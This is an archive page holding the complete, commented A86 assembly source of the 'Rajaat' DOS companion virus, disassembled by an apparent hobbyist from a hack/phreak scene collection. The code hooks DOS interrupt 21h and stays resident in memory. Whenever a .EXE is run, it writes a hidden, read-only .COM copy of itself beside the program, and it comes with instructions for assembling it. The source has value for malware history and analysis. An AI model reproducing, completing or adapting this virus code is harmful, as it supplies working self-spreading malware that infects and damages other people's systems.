Collection of Hack-Phreak Scene Programs

home *** CD-ROM | disk | FTP | other *** search

/ Collection of Hack-Phreak Scene Programs / cleanhpvac.zip / cleanhpvac / RJUPDAT2.ZIP / RAJT-287.ZIP / RAJT-287.A86 next >

Wrap

Text File | 1996-05-17 | 9KB | 234 lines

; rajt-287.a86 ; TSR companion virus ; ; ; VSUM was a dud on this one (I really should get an update ;^)) ; So here is: ; A quick and dirty disaster.. urrr.. disasembly by novice. ; ; you_say_I_make_to_long_labels? get_out_of_here! ; ; assemble with a86 rajt-287.a86 ; ; p.s. disregard the corny comments .RADIX 16 ; virus specific equates ATTR_HIDDEN_READONLY EQU 03 COM_BEGIN EQU 0100 RESIDENCY_TEST EQU 03015 PARAGRAPH_SIZE EQU 029 TSR_FLAG EQU 0221 VIR_LENGTH EQU 011F ; dos function equates ADJUST_MEM_BLK_SIZE EQU 049 CLOSE_FILE_W_HANDLE EQU 03E CREATE_FILE_W_HANDLE EQU 03C00 DUPLICATE_HANDLE EQU 045 EXIT_CODE_SUB_PROG EQU 04D FREE_MEM EQU 04A GET_PUT_ATTRIB EQU 043 GET_VECT_INT21 EQU 03521 LOAD_EXECUTE EQU 04B00 QUIT_WITH_EXIT_CODE EQU 04C SET_VECT_INT21 EQU 02521 WRITE_TO_FILE_W_HANDLE EQU 040 START: ; And away we go! MOV B[TSR_FLAG],0 ; Set flag to 0 MOV AX,RESIDENCY_TEST ; Ask for DOS-version INT 021 ; CMP BX,RESIDENCY_TEST ; Returns BX=3015? JE SET_TSR_FLAG ; Yes, virus is resident. SET_INT_21: ; MOV AX,GET_VECT_INT21 ; Ask for interrupt vector 21 INT 021 ; MOV W[OLD_INT21_CS],BX ; Store interrupt 21 MOV W[OLD_INT21_IP],ES ; MOV AX,SET_VECT_INT21 ; Set interrupt 21 to our own interr. MOV DX,OFFSET NEW_INT_21; INT 021 ; JMP SHORT SETUP_1STRUN ; jump to VANITY_PLATE: db "Rajaat" ; i wonder what mug goes with ; this monnikker? (racist? who? MOI??) SET_TSR_FLAG: ; set up parameter block + arguments MOV B[TSR_FLAG],1 ; set flag SETUP_1STRUN: ; MOV AH,FREE_MEM ; adjust memory block size PUSH CS ; exchange cs en es POP ES ; (cs=segmentaddr companionvirus) MOV BX,PARAGRAPH_SIZE ; virus size in paragr. INT 021 ; MOV ES,W[02C] ; es point to envir. block MOV AH,ADJUST_MEM_BLK_SIZE ; adjust mem block INT 021 ; MOV DI,1 ; set up di=1 ax=0 XOR AX,AX ; READ_IN: ; DEC DI ; SCASW ; JNE READ_IN ; haul in the program environment LEA SI,[DI+2] ; PUSH ES ; POP DS ; PUSH CS ; POP ES ; MOV DI,0222 ; PUSH DI ; SEARCH_EXT: ; LODSB ; STOSB ; CMP AL,'.' ; is there a _point_ to this? JNE SEARCH_EXT ; no? shut up and soldier! CALL SET_EXTENSION ; change extension to .EXE PUSH CS ; POP DS ; POP DX ; MOV AX,LOAD_EXECUTE ; execute! (the .EXE progam that is) MOV BX,0213 ; point to param block MOV W[021F],CS ; set the registers MOV W[021B],CS ; MOV W[0217],CS ; MOV SP,0286 ; point to end param block ? INT 021 ; execute the host and parameters CS CMP B[TSR_FLAG],1 ; already resident? JE ALREADY_RESIDENT ; yes go on GO_RESIDENT: MOV DX,0286 ; dx=last program byte +1 INT 027 ; go res. and end virus program. ; exit to DOS ; Note: The exit code of the .EXE ; gets lost here! ALREADY_RESIDENT: ; MOV AH,EXIT_CODE_SUB_PROG ; get exit code subprogram ; (=companioned .EXE) INT 021 ; MOV AH,QUIT_WITH_EXIT_CODE ; quit to DOS with exit code of ; companioned .EXE INT 021 ; SET_EXTENSION: ; MOV AX,05845 ; 'XE' STOSW ; MOV AX,045 ; 'E' STOSW ; RET OLD_INT_21: OLD_INT21_CS DW 00 ; storage for original int 21 adresses OLD_INT21_IP DW 00 ; NEW_INT_21: CMP AX,RESIDENCY_TEST ; residency check? JNE CHECK_FUNCTIONS ; no continue MOV BX,AX ; yes swap ax and bx IRET ; return to calling virus CHECK_FUNCTIONS: CMP AX,LOAD_EXECUTE ; is it an execute command? JE VIRAL_INT ; yes jump to virus handler CMP AH,GET_PUT_ATTRIB ; is it a get/put file attrib command? JE VIRAL_INT ; yes, jump to viral handler. ; NOTE: The only effect of letting ; get/put file attrib be handled by ; the virus handler is that the virus ; sets its own file attribute to HR each time ; it is run. So if you use ATTRIB.EXE to ; change the settings of the .COM ; file, each time it is run the .COM ; file is set back to HR. ; Neat, but a bit pointless! JUMP_OLD_INT21: ; let old int handle things CS JMP D[OLD_INT_21] ; jump to ..OLD_INT_21 INT21_CALL: PUSHF CS CALL D[OLD_INT_21] ; call old_int_21 from within virus RET ; VIRAL_INT: PUSH AX ; Save Our Souls (and registers) PUSH BX ; PUSH CX ; PUSH DX ; PUSH SI ; PUSH DI ; PUSH DS ; PUSH ES ; MOV SI,DX ; FIND_EXTENSION: ; LODSB ; CMP AL,'.' ; Get to da point will yah JNE FIND_EXTENSION ; PUSH SI LODSW ; load first 2 chars of extension OR AX,02020 ; conversion to ascii ?? CMP AX,07865 ; check for 'XE' JNE EXIT_VIRUS_INT ; no, exit LODSB ; check for 'E' OR AL,020 ; conversion to ascii? CMP AL,065 ; (better that than to hari krisna) JNE EXIT_VIRUS_INT ; CHANGE_EXTENSION: ; change extension to .COM POP DI ; PUSH DI ; PUSH DS ; POP ES ; MOV AX,04F43 ; 'OC' STOSW ; MOV AL,04D ; 'M' STOSB ; WRITE_VIRUS: ; write virus to disk MOV AX,CREATE_FILE_W_HANDLE MOV CX,ATTR_HIDDEN_READONLY CALL INT21_CALL ; XCHG AX,BX ; store file handle PUSH CS ; POP DS ; MOV DX,COM_BEGIN ; start at 100h MOV CX,VIR_LENGTH ; for vir_length bytes MOV AH,WRITE_TO_FILE_W_HANDLE CALL INT21_CALL ; MOV AH,CLOSE_FILE_W_HANDLE CALL INT21_CALL ; POP DI ; CALL SET_EXTENSION ; JMP EXIT_VIRUS_INT_2 ; EXIT_VIRUS_INT: ; POP SI ; EXIT_VIRUS_INT_2: ; POP ES ; wotta lotta poppers! POP DS ; POP DI ; POP SI ; POP DX ; POP CX ; POP BX ; POP AX ; JMP JUMP_OLD_INT21 ; definitly a case of the jumps DATA_DUMP: ; db 00,00,80,00,56,07,5c ; db 00,56,07,6c,00 ; END ; t-t-thats all f-f-folks